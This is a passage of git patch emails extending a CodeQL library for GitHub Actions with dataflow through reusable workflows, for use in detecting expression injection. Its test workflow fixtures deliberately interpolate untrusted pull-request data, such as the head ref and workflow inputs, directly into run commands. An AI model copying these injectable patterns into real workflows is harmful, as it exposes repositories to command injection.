super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 534eb4fe657b..1e6fbd5b8544 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,17 +6,32 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = TExprNode(DataFlowExpr e) +newtype TNode = + TExprNode(DataFlowExpr e) or + TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or + TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } /** - * Not used + * Reusable workflow input nodes */ -class ParameterNode extends Node { - ParameterNode() { none() } +class ParameterNode extends Node, TParameterNode { + private ParamExpr parameter; + + ParameterNode() { this = TParameterNode(parameter) } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + ParamExpr getParameter() { result = parameter } } /** - * Not used + * Reusable workflow output nodes */ class ReturnNode extends Node { ReturnNode() { none() } @@ -35,17 +50,25 @@ class OutNode extends ExprNode { } } +/** + * Not used + */ class CastNode extends Node { CastNode() { none() } } +/** + * Not used + */ class PostUpdateNode extends Node { PostUpdateNode() { none() } Node getPreUpdateNode() { none() } } -predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { arg.argumentOf(call, pos) @@ -64,7 +87,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -79,27 +102,16 @@ class DataFlowCall instanceof Cfg::Node { DataFlowCallable getEnclosingCallable() { result = super.getScope() } } -// class DataFlowCallable instanceof Cfg::CfgScope { -// DataFlowCallable() { none() } -// -// string toString() { result = super.toString() } -// -// string getName() { result = "none" } -// } /** * A Cfg scope that can be called - * There are no callables in Actions, at least not in the AST + * ReusableWorkflowStmt */ -class DataFlowCallable instanceof Cfg::CfgScope { +class DataFlowCallable instanceof ReusableWorkflowStmt { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { - if this instanceof StepStmt - then result = this.(StepStmt).getId() - else result = this.(JobStmt).getId() - } + string getName() { result = super.getName() } } newtype TReturnKind = TNormalReturn() @@ -114,7 +126,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { none() } +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } // /** // * Holds if the set of viable implementations that can be called by `call` @@ -173,11 +185,10 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Not used since we dont have Callables in the AST * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { none() } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } } /** @@ -188,18 +199,12 @@ class ArgumentPosition extends string { } /** - * Not really used since we dont have Callables in the AST but needed for the InputSig signature */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -/** - * a simple local flow step - */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } - -predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(UsesExpr uses, StepOutputAccessExpr outputRead | + exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and @@ -233,11 +238,16 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - usesOutputDefToUse(nodeFrom, nodeTo) or + stepUsesOutputDefToUse(nodeFrom, nodeTo) or runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + /** * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/lib/test/.github/workflows/test.yml index 2760a6c3d35f..754105a49e63 100644 --- a/ql/lib/test/.github/workflows/test.yml +++ b/ql/lib/test/.github/workflows/test.yml @@ -13,7 +13,7 @@ jobs: fetch-depth: 0 - name: Get changed files - id: source + id: source uses: tj-actions/changed-files@v40 - name: Remove foo from changed files @@ -21,8 +21,12 @@ jobs: uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' + find: "foo" + replace: "" + - id: simplesink1 + run: echo ${{ steps.source.outputs.all_changed_files }} + - id: simplesink2 + run: ${{ github.event.pull_request.head.ref }} job2: runs-on: ubuntu-latest diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 2e358f3c30bd..31bcdc256d8a 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -12,7 +12,11 @@ query predicate jobNodes(JobStmt s) { any() } query predicate stepNodes(StepStmt s) { any() } -query predicate usesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(UsesExpr s) { any() } + +query predicate stepUsesNodes(StepUsesExpr s) { any() } + +query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { call.getArgument(argname) = arg @@ -42,17 +46,22 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + //any() + n.getAstNode() instanceof JobUsesExpr +} -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "simple1.yml" +} query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } +query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } -query predicate usesIds(UsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } From 3152ed71babc92524cf2f7a326c4f3a212411fad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 11:57:47 +0100 Subject: [PATCH 015/707] dataflow through reusable workflows --- ql/lib/codeql/actions/Ast.qll | 135 +++++++++++++----- ql/lib/codeql/actions/Consistency.ql | 3 + ql/lib/codeql/actions/DataFlow.qll | 8 ++ .../actions/controlflow/internal/Cfg.qll | 39 ++++- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 78 +++++----- .../dataflow/internal/DataFlowPublic.qll | 42 +++++- .../.github/workflows/calling_workflow.yml | 28 +++- .../.github/workflows/reusable_workflow.yml | 21 ++- ql/lib/test/test.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/test/partial.ql | 33 +++++ 13 files changed, 298 insertions(+), 98 deletions(-) create mode 100644 ql/lib/codeql/actions/Consistency.ql create mode 100644 ql/src/test/partial.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f8347e766f4..b84f884c034f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -39,23 +39,21 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } class ReusableWorkflowStmt extends WorkflowStmt { - YamlMapping parameters; + YamlValue workflow_call; ReusableWorkflowStmt() { - exists(Actions::On on | - on.getWorkflow() = this and - on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters - ) + this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ParamsStmt getParams() { result = parameters } + InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - // TODO: implemnt callable name string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ParamsStmt extends Statement instanceof YamlMapping { - ParamsStmt() { +class InputsStmt extends Statement instanceof YamlMapping { + InputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } @@ -72,12 +70,38 @@ class ParamsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - ParamExpr getParamExpr(string name) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + InputExpr getInputExpr(string name) { + result.(YamlString).getValue() = name and + this.(YamlMapping).maps(result, _) } } -class ParamExpr extends Expression instanceof YamlValue { } +class InputExpr extends Expression instanceof YamlString { } + +class OutputsStmt extends Statement instanceof YamlMapping { + OutputsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * outputs: + * firstword: + * description: "The first output string" + * value: ${{ jobs.example_job.outputs.output1 }} + * secondword: + * description: "The second output string" + * value: ${{ jobs.example_job.outputs.output2 }} + */ + OutputExpr getOutputExpr(string name) { + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + } +} + +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -117,8 +141,13 @@ class JobStmt extends Statement instanceof Actions::Job { /** * Reusable workflow jobs may have Uses children + * eg: + * call-job: + * uses: ./.github/workflows/reusable_workflow.yml + * with: + * arg1: value1 */ - JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } + JobUsesExpr getUsesExpr() { result.getJob() = this } } /** @@ -152,8 +181,11 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +/** + * Abstract class representing a call to a 3rd party action or reusable workflow. + */ abstract class UsesExpr extends Expression { - abstract string getTarget(); + abstract string getCallee(); abstract string getVersion(); @@ -168,7 +200,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { StepUsesExpr() { uses.getStep() = this } - override string getTarget() { result = uses.getGitHubRepository() } + override string getCallee() { result = uses.getGitHubRepository() } override string getVersion() { result = uses.getVersion() } @@ -183,12 +215,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlScalar { - JobStmt job; - - JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } +class JobUsesExpr extends UsesExpr instanceof YamlMapping { + JobUsesExpr() { + this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) + } - JobStmt getJob() { result = job } + JobStmt getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -200,31 +232,31 @@ class JobUsesExpr extends UsesExpr instanceof YamlScalar { private string pathUsesParser() { result = "\\./(.+)" } - override string getTarget() { - exists(string name | - this.(YamlScalar).getValue() = name and - if name.matches("./%") - then result = name.regexpCapture(this.pathUsesParser(), 1) + override string getCallee() { + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if name.getValue().matches("./%") + then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else result = - name.regexpCapture(this.repoUsesParser(), 1) + "/" + - name.regexpCapture(this.repoUsesParser(), 2) + "/" + - name.regexpCapture(this.repoUsesParser(), 3) + name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 3) ) } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { - exists(string name | - this.(YamlScalar).getValue() = name and - if not name.matches("\\.%") - then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } override Expression getArgument(string key) { - job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -287,6 +319,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { /** * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` + * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -294,9 +327,11 @@ class JobOutputAccessExpr extends ExprAccessExpr { JobOutputAccessExpr() { jobId = - this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + this.getExpression() + .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and varName = - this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + this.getExpression() + .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } string getVarName() { result = varName } @@ -305,7 +340,35 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(varName) = result + ( + // A Job can have multiple outputs, so we need to check both + // jobs..outputs. + job.getOutputStmt().getOutputExpr(varName) = result + or + // jobs..uses (variables returned from the reusable workflow + job.getUsesExpr() = result + ) + ) + } +} + +/** + * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. + * eg: `${{ inputs.foo}}` + */ +class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { + string paramName; + + ReusableWorkflowInputAccessExpr() { + paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getParamName() { result = paramName } + + Expression getInputExpr() { + exists(ReusableWorkflowStmt w | + w.getLocation().getFile() = this.getLocation().getFile() and + w.getInputs().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/Consistency.ql b/ql/lib/codeql/actions/Consistency.ql new file mode 100644 index 000000000000..fa3a2bc9e5ce --- /dev/null +++ b/ql/lib/codeql/actions/Consistency.ql @@ -0,0 +1,3 @@ +import DataFlow::DataFlow::Consistency + + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index d1e714e8fbc0..5040865be1d2 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,4 +7,12 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic + + /** debug */ + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { + import DFIC::MakeConsistency + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ac8ab616e3ec..057d7872ee3b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - private class JobScope extends CfgScope instanceof JobStmt { } + class JobScope extends CfgScope instanceof JobStmt { } } private module Implementation implements CfgShared::InputSig { @@ -123,7 +123,7 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(ReusableWorkflowStmt).getInputs(), e) or first(scope.(JobStmt), e) } @@ -148,14 +148,39 @@ private import Completion private import CfgScope private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { - override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getInputs() or child = super.getOutputs()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getInputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } -private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getParamExpr(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -164,7 +189,7 @@ private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof } } -private class ParamExprTree extends LeafTree instanceof ParamExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b2ab51e28fa8..3e6a6141767c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -127,7 +127,7 @@ private class EventSource extends RemoteFlowSource { private class ChangedFilesSource extends RemoteFlowSource { ChangedFilesSource() { exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and + uses.getCallee() = "tj-actions/changed-files" and uses.getVersion() = ["v10", "v20", "v30", "v40"] and uses = this.asExpr() ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 223ff305ba43..ead312d8af6b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -26,7 +26,7 @@ class AdditionalTaintStep extends Unit { private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | - u.getTarget() = "mad9000/actions-find-and-replace-string" and + u.getCallee() = "mad9000/actions-find-and-replace-string" and pred.asExpr() = u.getArgument(["source", "replace"]) and succ.asExpr() = u ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1e6fbd5b8544..02b7de847e3e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,38 +6,7 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = - TExprNode(DataFlowExpr e) or - TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or - TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } - -/** - * Reusable workflow input nodes - */ -class ParameterNode extends Node, TParameterNode { - private ParamExpr parameter; - - ParameterNode() { this = TParameterNode(parameter) } - - predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) - } - - override string toString() { result = parameter.toString() } - - override Location getLocation() { result = parameter.getLocation() } - - ParamExpr getParameter() { result = parameter } -} - -/** - * Reusable workflow output nodes - */ -class ReturnNode extends Node { - ReturnNode() { none() } - - ReturnKind getKind() { none() } -} +newtype TNode = TExprNode(DataFlowExpr e) class OutNode extends ExprNode { private DataFlowCall call; @@ -76,6 +45,8 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) + // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) + // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -97,21 +68,27 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + string getName() { result = super.getAstNode().(UsesExpr).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } /** * A Cfg scope that can be called - * ReusableWorkflowStmt */ -class DataFlowCallable instanceof ReusableWorkflowStmt { +class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getName() } + string getName() { + if this instanceof ReusableWorkflowStmt + then result = this.(ReusableWorkflowStmt).getName() + else + if this instanceof JobStmt + then result = this.(JobStmt).getId() + else none() + } } newtype TReturnKind = TNormalReturn() @@ -188,7 +165,7 @@ ContentApprox getContentApprox(Content c) { none() } * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } } /** @@ -231,20 +208,25 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getInputExpr() = astFrom + ) +} + /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) -} +predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } /** - * a simple local flow step + * a simple local flow step that should always preserve the call context (same callable) */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } @@ -252,8 +234,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global * variable. + * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node node1, Node node2) { none() } +predicate jumpStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 41be90718d85..80f504963b9b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -44,6 +44,28 @@ class ExprNode extends Node, TExprNode { override AstNode asExpr() { result = expr.getAstNode() } } +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private InputExpr parameter; + + ParameterNode() { + this.asExpr() = parameter and + parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + InputExpr getInputExpr() { result = parameter } +} + /** * An argument to a Uses step (call) */ @@ -51,12 +73,30 @@ class ArgumentNode extends ExprNode { ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { - this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Cfg::Node node; + + ReturnNode() { + this.getCfgNode() = node and + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "return " + node.toString() } + + override Location getLocation() { result = node.getLocation() } +} + /** Gets the node corresponding to `e`. */ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml index 3b0ab8f18d32..9aafe1189efa 100644 --- a/ql/lib/test/.github/workflows/calling_workflow.yml +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -1,18 +1,38 @@ -on: push +name: Call a reusable workflow and use its outputs + +on: + workflow_dispatch: jobs: - call-workflow-1-in-local-repo: + call1: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-2-in-local-repo: + call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-in-another-repo: + call3: uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit + + job1: + runs-on: ubuntu-latest + needs: call1 + steps: + - run: echo ${{ needs.call1.outputs.workflow-output }} + job2: + runs-on: ubuntu-latest + needs: call2 + steps: + - run: echo ${{ needs.call2.outputs.workflow-output1 }} + - run: echo ${{ needs.call2.outputs.workflow-output2 }} + job3: + runs-on: ubuntu-latest + needs: call3 + steps: + - run: echo ${{ needs.call3.outputs.workflow-output }} diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml index f31c8a63d740..45c177edecb6 100644 --- a/ql/lib/test/.github/workflows/reusable_workflow.yml +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -6,13 +6,28 @@ on: config-path: required: true type: string + outputs: + workflow-output1: + value: ${{ jobs.job1.outputs.job-output1 }} + workflow-output2: + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true jobs: - triage: + job1: runs-on: ubuntu-latest + outputs: + job-output1: ${{ steps.step1.outputs.step-output}} + job-output2: ${{ steps.step2.outputs.all_changed_files}} steps: - - id: sink - run: echo ${{ inputs.config-path }} + - id: step1 + env: + CONFIG_PATH: ${{ inputs.config-path }} + run: | + echo ${{ inputs.config-path }} + echo "::set-output name=step-output:: $CONFIG_PATH" + - name: Get changed files + id: step2 + uses: tj-actions/changed-files@v40 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 31bcdc256d8a..8d558cbaacdb 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -48,7 +48,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof JobUsesExpr + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -66,3 +66,5 @@ query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } + +query predicate scopes(Cfg::CfgScope c) { any() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4af1e2c286a6..2fe6f17dfb61 100644 --- 